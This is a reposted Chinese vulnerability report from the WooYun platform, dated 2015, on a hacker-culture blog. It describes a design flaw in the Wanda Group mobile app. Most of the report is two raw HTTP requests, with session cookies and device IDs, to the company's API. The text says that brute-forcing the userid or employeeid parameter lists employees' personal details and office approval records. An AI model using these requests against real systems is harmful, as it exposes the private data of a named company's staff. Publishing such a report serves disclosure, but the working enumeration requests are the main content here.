记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

大连万达集团APP设计缺陷可再次遍历员工个人信息和部分办公信息

2015-12-14 00:15

1.还是那个“万达集团”APP



2.两个接口,获取员工个人信息,爆破userid就行了

code 区域
GET http://app.wanda.cn/wanda3v/user/userinfo.html?userid=wangyang HTTP/1.1

Host: app.wanda.cn

Connection: close

Accept-Encoding: gzip

User-Agent: 万达集团 3.0 rv:6612 (iPad; iPhone OS 8.4; zh_CN)

Connection: close

Cookie: jsessionid|JSESSIONID=6c1fd8e773545ae579fcacc22a7c22df



3.获取员工OA部分信息

code 区域
GET http://app.wanda.cn/wanda3v/oaapprove/oaapprovelist.html?type=1&resolution=960*640&vid=2a51f71011fc448cb186eb1958b0ec55&devid=7c7db2d9ec0c17619d0671d1088b21e22a3aa7c9&employeeid=wanglei0&sysversion=8.4&devicetype=0&num=20&start=1&datetime=1446097677&devtype=0&systype=iPhone%20OS&phonemodel=Unknown%20iPad&appname=ctx&appversion=3.0 HTTP/1.1

Host: app.wanda.cn

Connection: close

Accept-Encoding: gzip

User-Agent: 万达集团 3.0 rv:6612 (iPad; iPhone OS 8.4; zh_CN)

Connection: close

Cookie: jsessionid|JSESSIONID=4428f07da5ab0bc877967df8bf788dce



漏洞证明:

个人信息:

1.png

2.png

3.png



OA信息:

5.png

6.png

7.png

修复方案:

哎~~~还是没找到聪个电话号


知识来源: www.wooyun.org/bugs/wooyun-2015-0150361

阅读:144866 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“大连万达集团APP设计缺陷可再次遍历员工个人信息和部分办公信息”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

ADS

标签云

本页关键词